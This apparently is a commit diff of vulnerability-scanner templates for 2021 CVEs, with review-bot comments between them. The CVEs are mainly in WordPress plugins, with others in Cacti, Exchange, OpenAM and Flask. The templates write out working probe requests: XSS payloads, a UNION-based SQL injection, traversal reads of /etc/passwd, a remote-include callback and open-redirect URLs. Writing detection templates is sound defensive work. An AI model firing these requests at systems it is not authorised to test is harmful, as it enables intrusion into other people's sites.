description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24300
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24300
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="\"onmouseover=alert(document.domain);//">'
|
||||
- "PickPlugins Product Slider"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
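Review bot: The wp-login step is never verified, so a rejected `username`/`password` pair becomes a silent miss rather than a visible error: if WordPress refuses the credentials the follow-up admin request is presumably answered with a redirect back to wp-login.php and the `status: 200` matcher simply drops the result. A short comment above `requests:` stating the dependency, e.g. `# requires the username and password variables of a WordPress account`, would make it explicit for anyone running the template. The same applies to the other authenticated WordPress templates in this commit (CVE-2021-24488, -24510, -24750, -24926, -24947, -24991, -25008, -25052, -34640, -34643).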
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-24488
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Post Grid < 2.1.8 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24488
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-24488
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'value="\"onmouseover=alert(document.domain)/">'
|
||||
- 'Post Grid'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
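Review bot: The body matcher `- 'value="\"onmouseover=alert(document.domain)/">'` expects a single slash after `alert(document.domain)` while the request line sends `alert(document.domain)//`, so unless the plugin collapses the double slash (not visible here) the reflected value ends in `)//">` and the matcher never fires. The sibling template CVE-2021-24300 keeps request and matcher aligned (`;//` in both); align this one the same way, e.g. `- 'value="\"onmouseover=alert(document.domain)//">'`, or add a comment explaining why one slash is dropped. This template also omits the `text/html` header matcher that CVE-2021-24300 uses for the same kind of check.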
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-24510
|
||||
|
||||
info:
|
||||
name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24510
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-24510
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="></script><script>alert(document.domain)</script><" HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
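Review bot: `cvss-score: 6.10` is an unquoted YAML float and loads as 6.1, so the trailing zero is lost anyway; write `cvss-score: 6.1` as the neighbouring templates do. The same value appears in CVE-2021-24838, CVE-2021-26247, CVE-2021-32618, CVE-2021-34640 and CVE-2021-34643, and the same pattern in CVE-2021-29156 (`7.50`) and CVE-2021-32682 (`9.80`). `tags: wordpress,cve,cve2021,wp-plugin,authenticated` also omits `xss` although the name and `cwe-id: CWE-79` describe reflected XSS; CVE-2021-34640 and CVE-2021-34643 share that omission while every other XSS template in the commit carries the tag, so tag-based selection would skip these three.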
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-24750
|
||||
|
||||
info:
|
||||
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
|
||||
author: cckuakilong
|
||||
severity: high
|
||||
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
|
||||
reference:
|
||||
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2021-24750
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "266f89556d2b38ff067b580fb305c522"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
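Review bot: `author: cckuakilong` looks like a typo for `cckuailong`, the author name on the neighbouring templates in this commit; a misspelt author name also becomes a separate entry wherever templates are grouped by author. The first reference is a third-party exploit script; for a detection template the wpscan advisory or the vendor changelog is the better primary reference, with the script at most as a secondary link.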
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-24838
|
||||
|
||||
info:
|
||||
name: AnyComment <= 0.2.21 - Open Redirect
|
||||
author: noobexploiter
|
||||
severity: medium
|
||||
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
|
||||
tags: wordpress,wp-plugin,open-redirect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-24838
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
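Review bot: `tags: wordpress,wp-plugin,open-redirect` is the only tag line in this commit without `cve,cve2021`, and it uses `open-redirect` where the other open-redirect template here (CVE-2021-32618) uses `redirect`, so selecting by either tag misses one of the two. Suggest `tags: cve,cve2021,wordpress,wp-plugin,redirect`, and move the `classification:` block above `tags:` to match the layout of the other templates.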
@ -0,0 +1,43 @@
|
|||
id: CVE-2021-24926
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Domain Check < 1.0.17 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24926
|
||||
classification:
|
||||
cve-id: CVE-2021-24926
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
- "Domain Check"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
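Review bot: The `classification:` block carries only `cve-id` and `cwe-id`; the `cvss-metrics`/`cvss-score` pair that every other classified template in this commit records is missing, and CVE-2021-24947 has the same gap. Both templates already link the NVD entry, so the vector and score can be filled in now rather than left for a later enhancement pass.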
@ -0,0 +1,39 @@
|
|||
id: CVE-2021-24947
|
||||
|
||||
info:
|
||||
name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24947
|
||||
classification:
|
||||
cve-id: CVE-2021-24947
|
||||
cwe-id: CWE-23
|
||||
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2021-24991
|
||||
|
||||
info:
|
||||
name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
cve-id: CVE-2021-24991
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
|
||||
- "WooCommerce PDF Invoices"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
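Review bot: The request line `GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=...` contains `§ion=` where the description names the vulnerable parameter `section`; `&sect` followed by `ion` is exactly what `&section` turns into when an HTML entity is decoded, so if the file really contains `§` the request never sets `section` and the matcher can only miss. Please check the raw file and restore `&section=` if the character survived into it; if this is only the page rendering, nothing to change.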
@ -0,0 +1,44 @@
|
|||
id: CVE-2021-25008
|
||||
|
||||
info:
|
||||
name: The Code Snippets WordPress plugin < 2.14.3 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25008
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-25008
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
|
||||
- "Snippets"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2021-25052
|
||||
|
||||
info:
|
||||
name: The Button Generator WordPress plugin < 2.3.3 - RFI
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25052
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2021-25052
|
||||
cwe-id: CWE-352
|
||||
tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
|
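Review bot: `matchers-condition: and` ties the interactsh hit to `status: 200`, so a server that performs the remote include but then errors out (non-200) would still have made the outbound request yet would not be reported; the OAST interaction is the decisive evidence here and the status check mainly adds false negatives. Consider dropping the status matcher so the `interactsh_protocol` matcher alone decides. `cwe-id: CWE-352` also reads oddly next to the `rfi` tag and an authenticated include request; if the advisory classifies the issue as CSRF, a short comment saying so would stop it being "corrected" later.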
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-25864
|
||||
|
||||
info:
|
||||
name: Hue Magic - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
|
||||
reference:
|
||||
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
|
||||
- https://www.cvedetails.com/cve/CVE-2021-25864
|
||||
metadata:
|
||||
shodan-query: title:"NODE-RED"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-25864
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,huemagic,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
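Review bot: The description reads `Directory Traversal.in the res.sendFile API`, a stray full stop where a space belongs: `... affected by hue/assets/..%2F Directory Traversal in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.` The second reference points at cvedetails while the other templates link the canonical record, `https://nvd.nist.gov/vuln/detail/CVE-2021-25864`.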
@ -4,7 +4,7 @@ info:
|
|||
author: dhiyaneshDk,philippedelteil
|
||||
severity: critical
|
||||
name: Confluence Server OGNL injection - RCE
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
tags: cve,cve2021,rce,confluence,injection,ognl
|
||||
reference:
|
||||
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-26247
|
||||
|
||||
info:
|
||||
name: Unauthenticated XSS Cacti - auth_changepassword.php
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-26247
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,cacti,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
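Review bot: `reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247` is a plain scalar while every other template in the commit writes `reference:` as a list, so anything iterating reference entries receives a string here; write it as `reference:` followed by `- https://nvd.nist.gov/vuln/detail/CVE-2021-26247`. The description is phrased as an instruction to the reader ("As an unauthenticated remote user, visit ...") rather than as a statement of the weakness; something like `description: Cacti reflects the ref URL parameter of auth_changepassword.php into the page without escaping, allowing an unauthenticated user to trigger reflected cross-site scripting.` matches the register of the other templates. The `name` would likewise read better in the form used elsewhere, e.g. `Cacti - Unauthenticated Reflected Cross-Site Scripting (auth_changepassword.php)`.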
@ -1,13 +1,14 @@
|
|||
id: CVE-2021-26855
|
||||
|
||||
info:
|
||||
name: Exchange Server SSRF Vulnerability
|
||||
name: Microsoft Exchange Server SSRF Vulnerability
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
|
||||
remediation: Apply the appropriate security update.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
|
||||
reference:
|
||||
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
|
||||
|
@ -29,3 +30,4 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
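Review bot: The new description has a typo, `Be aware his CVE ID is unique from ...`, which should read `Be aware this CVE ID is unique from ...`. `remediation: Apply the appropriate security update.` could point the operator at the linked MSRC advisory that lists the update, e.g. `remediation: Apply the Exchange Server security update referenced in the MSRC advisory.` The enclosing `info:` block continues outside the hunk.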
@ -1,12 +1,17 @@
|
|||
id: CVE-2021-29156
|
||||
|
||||
info:
|
||||
name: LDAP Injection In Openam
|
||||
name: LDAP Injection In OpenAM
|
||||
author: melbadry9,xelkomy
|
||||
severity: high
|
||||
tags: cve,cve2021,openam,ldap,injection
|
||||
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
|
||||
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
|
||||
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
|
||||
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
|
||||
reference:
|
||||
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
|
||||
https://hackerone.com/reports/1278050
|
||||
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
|
||||
https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "jato.pageSession") && status_code==200'
|
||||
|
||||
# Enhanced by cs on 2022/01/24
|
||||
|
|
|
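Review bot: The rewritten `reference:` block lists its four URLs without the `- ` sequence marker that every other template uses; depending on how they are indented in the file, YAML either folds them into one multi-line string or fails to parse, so each should be a list item, `- https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md` and likewise for the three URLs that follow. The `info:` block continues past the hunk, so the lines after `cvss-score` could not be checked here.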
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-32618
|
||||
|
||||
info:
|
||||
name: Flask Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
|
||||
reference:
|
||||
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
|
||||
- https://github.com/Flask-Middleware/flask-security/issues/486
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32618
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-32618
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2021,redirect,flask
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login?next=\\\example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
